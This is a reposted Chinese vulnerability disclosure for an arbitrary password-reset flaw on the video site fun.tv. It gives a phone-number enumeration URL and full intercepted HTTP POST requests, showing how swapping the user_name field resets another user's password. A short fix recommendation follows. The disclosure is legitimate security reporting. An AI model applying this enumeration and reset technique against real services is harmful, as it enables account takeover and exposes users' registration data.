风行网任意用户密码重置漏洞

1. 通过下面url的返回结果,可以遍历出所有的手机注册账户: 

http://api1.fun.tv/ajax/get_mobile_vcode/电话号码/reset_password

存在的账户,返回:

{"status":200,"msg":"","url":"","field":""}

不存在的账户,返回:

{"status":400,"msg":"wrong mobile","url":"","field":""}



2. 手机注册一个账号,执行密码找回,输入接受到的验证码,确定后进入密码重置界面;

3. 输入新的密码,开启 fiddler 截获请求,点击确定;

code 区域
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache
。。。
user_name=电话号码&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670

漏洞证明:

风行网任意用户密码重置漏洞

code 区域
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache
user_name=18612xxxx10&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670
code 区域
POST http://www.fun.tv/account/password/set?isajax=1 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://www.fun.tv/account/password/setbymobile
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.fun.tv
Content-Length: 71
Connection: Keep-Alive
Pragma: no-cache
user_name=18612xxx097&passwd=8e93ff85d9b1670&verifypass=8e93ff85d9b1670

修复方案:

凭证用过即失效,凭证和账号关联。

原文地址:https://www.77169.com/exploits/2015/20150413014809.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

相关文章

发表评论

电子邮件地址不会被公开。